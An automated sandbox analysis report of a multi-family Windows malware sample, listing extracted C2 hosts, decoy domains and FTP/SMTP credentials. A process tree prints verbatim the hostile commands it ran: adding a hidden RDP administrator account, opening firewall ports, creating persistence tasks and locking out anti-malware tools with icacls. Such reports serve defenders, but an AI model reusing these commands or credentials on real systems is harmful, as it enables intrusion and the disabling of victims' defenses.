Analysis
-
max time kernel
1793s -
max time network
1807s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
19-11-2020 17:18
General
-
Target
Downloads.exe
-
Size
141.0MB
-
MD5
07917bc6f34323a498bbbf68eb446724
-
SHA1
6f192776575fe4087684d24a0a5fb07e5a1c76ed
-
SHA256
a6942a7cce17a9de2ff1679f685796468698f06a45f6e4e97b9ff5027ef35a86
-
SHA512
55ce66a638c3a939cfc3031c5f5f194181730a3d27ffd47524a2c5a1947b0cf4cbb38e65d39077d7947d40d952c11c68597e591c58bc025c62e6850d53036aee
Score
10/10
Malware Config
Extracted
Credentials
Protocol: ftp- Host:
45.141.184.35 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
Credentials
Protocol: smtp- Host:
mail.pro-powersourcing.com - Port:
587 - Username:
[email protected] - Password:
china1977
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
formbook
Version
4.0
C2
http://www.worstig.com/w9z/
Decoy
crazzysex.com
hanferd.com
gteesrd.com
bayfrontbabyplace.com
jicuiquan.net
relationshiplink.net
ohchacyberphoto.com
kauegimenes.com
powerful-seldom.com
ketotoken.com
make-money-online-success.com
redgoldcollection.com
hannan-football.com
hamptondc.com
vllii.com
aa8520.com
platform35markethall.com
larozeimmo.com
oligopoly.net
llhak.info
Extracted
Family
gozi_rm3
Botnet
86920224
C2
https://sibelikinciel.xyz
Attributes
-
build
300869
-
exe_type
loader
-
server_id
12
-
url_path
index.htm
rsa_pubkey.plain
serpent.plain
Extracted
Family
formbook
Version
4.1
C2
http://www.joomlas123.com/i0qi/
http://www.norjax.com/app/
Decoy
mytakeawaybox.com
goutaihuo.com
kuzey.site
uppertenpiercings.amsterdam
honeygrandpa.com
jenniferabramslaw.com
ncarian.com
heavilymeditatedhouston.com
gsbjyzx.com
akisanblog.com
taoyuanreed.com
jasperrvservices.com
yabbanet.com
myhealthfuldiet.com
flipdigitalcoins.com
toes.photos
shoottillyoumiss.com
maserental.com
smarteacher.net
hamdimagdeco.com
Extracted
Family
danabot
C2
92.204.160.54
2.56.213.179
45.153.186.47
93.115.21.29
185.45.193.50
193.34.166.247
rsa_pubkey.plain
Extracted
Family
qakbot
Botnet
spx129
Campaign
1590734339
C2
94.10.81.239:443
94.52.160.116:443
67.0.74.119:443
175.137.136.79:443
73.232.165.200:995
79.119.67.149:443
62.38.111.70:2222
108.58.9.238:993
216.110.249.252:2222
67.209.195.198:3389
84.247.55.190:443
96.37.137.42:443
94.176.220.76:2222
173.245.152.231:443
96.227.122.123:443
188.192.75.8:995
24.229.245.124:995
71.163.225.75:443
75.71.77.59:443
104.36.135.227:443
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
CoreEntity .NET Packer 1 IoCs
A .NET packer called CoreEntity where it has embedded the payload as a BitMap object which is later decrypted.
-
Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
-
Danabot x86 payload 12 IoCs
Detection of Danabot x86 payload, mapped in memory during the execution of its loader.
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Gozi RM3
A heavily modified version of Gozi using RM3 loader.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
-
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
-
Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Windows security bypass 2 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
AgentTesla Payload 25 IoCs
-
CryptOne packer 15 IoCs
Detects CryptOne packer defined in NCC blogpost.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Formbook Payload 21 IoCs
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Guloader Payload 2 IoCs
-
Looks for VirtualBox Guest Additions in registry 2 TTPs
-
Nirsoft 4 IoCs
-
ReZer0 packer 4 IoCs
Detects ReZer0, a packer with multiple versions used in various campaigns.
-
ASPack v2.12-2.42 8 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Adds policy Run key to start application 2 TTPs 2 IoCs
-
Blocklisted process makes network request 64 IoCs
-
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 4 IoCs
-
Executes dropped EXE 64 IoCs
-
Looks for VMWare Tools registry key 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
-
Sets DLL path for service in the registry 2 TTPs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
-
UPX packed file 19 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks QEMU agent file 2 TTPs 16 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
-
Drops startup file 6 IoCs
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 56 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 22 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops desktop.ini file(s) 64 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 8 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Modifies WinLogon 2 TTPs 7 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 8 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 10 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
-
Suspicious use of SetThreadContext 50 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 6 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 6 IoCs
-
Modifies Internet Explorer settings 1 TTPs 64 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 3 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Modifies system certificate store 2 TTPs 20 IoCs
-
NTFS ADS 3 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 11 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 30 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 11 IoCs
-
Suspicious behavior: LoadsDriver 34 IoCs
-
Suspicious behavior: MapViewOfSection 64 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 53 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 51 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 5 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\Downloads.exe"C:\Users\Admin\AppData\Local\Temp\Downloads.exe"2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Desktop\update.exe"C:\Users\Admin\Desktop\update.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Modifies WinLogon
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Programdata\Windows\install.bat" "5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Programdata\Install\del.bat5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"4⤵
- Executes dropped EXE
- NTFS ADS
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe5⤵
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\ProgramData\Microsoft\Intel\R8.exeC:\ProgramData\Microsoft\Intel\R8.exe5⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\rdp\pause.bat" "7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar8⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\rdp\bat.bat" "9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f10⤵
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f10⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f10⤵
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited11⤵
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Creates scheduled task(s)
-
-
C:\ProgramData\WindowsTask\update.exeC:\ProgramData\WindowsTask\update.exe5⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc3⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt3⤵
-
C:\Windows\SysWOW64\sc.exesc start appmgmt4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
